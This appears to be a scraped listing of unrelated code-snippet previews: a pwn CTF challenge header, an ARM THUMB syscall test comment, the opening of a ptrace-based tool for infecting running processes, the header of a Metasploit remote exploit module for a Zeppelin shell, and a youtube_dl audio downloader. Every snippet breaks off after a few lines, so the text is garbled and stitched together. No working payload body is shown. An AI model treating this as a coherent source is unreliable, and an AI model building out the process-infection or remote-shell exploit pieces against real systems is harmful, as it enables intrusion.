Type: pwn
Points: 151
Solves: 79
// Attempts syscalls via THUMB mode svc instructions. | |
// | |
// On kernels supporting THUMB mode instructions, | |
// "Thumbs up!" will be printed to stdout. | |
// | |
// On kernels which don't support THUMB mode instructions, | |
// you'll get a SIGSEGV. | |
// | |
// Make the ELF (on ARM): | |
// as kernelthumb.s -o kernelthumb.o |
/* Code stolen from https://0x00sec.org/t/linux-infecting-running-processes/1097/4 | |
Originally writen by @0x00pico (github @0x00pf), modified to use code cave by _py | |
Works for me on x64 */ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <stdint.h> | |
#include <sys/ptrace.h> | |
#include <sys/types.h> | |
#include <sys/wait.h> |
class MetasploitModule < Msf::Exploit::Remote | |
include Msf::Exploit::Remote::Tcp | |
def initialize | |
super( | |
'Name' => 'Anonymous Zeppelin Shell', | |
'Description' => 'This module sends a payload', | |
'Author' => 'bcaller', | |
'Arch' => [ ARCH_PYTHON, ARCH_CMD ], | |
'Platform' => ['unix'], |
# ydl-wikitongues by bcaller 2016 | |
# MIT License | |
# For downloading audio of wikitongues videos | |
import re | |
import argparse | |
import youtube_dl.YoutubeDL as YDL | |
EXTRACT_LANG = r'WIKITONGUES: [\w]+ speaking (?P<lang>(?![\b]and[\b])[^\W,]+)$' |